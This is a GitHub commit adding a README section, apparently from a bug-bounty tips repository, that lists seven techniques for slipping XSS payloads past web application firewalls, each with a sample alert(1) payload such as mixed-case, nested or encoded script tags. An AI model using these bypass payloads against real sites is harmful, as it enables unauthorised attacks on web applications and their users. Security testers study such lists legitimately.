Update README.md

This commit is contained in:
Xalgord 2021-02-20 15:49:48 +05:30 committed by GitHub
parent 3580965773
commit 624b385ed3
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -261,3 +261,22 @@ Heres list of tools [@_justYnot](https://twitter.com/_justYnot) used:
- https://github.com/tomnomnom/gf
- https://github.com/1ndianl33t/Gf-Patterns (xss pattern)
- https://github.com/tomnomnom/hacks/tree/master/kxss
## XSS firewall bypass techniques
Heres a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
1. Check if the firewall is blocking only lowercase:
<sCRipT>alert(1)</sCRiPt>
2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
<script>%0d%0aalert(1)</script>
3. Try double encoding:
%2522
4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
<scr<script>ipt>alert(1);</scr</script>ipt>
5. Injecting anchor tag without whitespaces:
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
6. Try to bypass whitespaces using a bullet:
<svgonload=alert(1)>
7. Try to change request method (POST instead of GET):
GET /?q=xss POST /
q=xss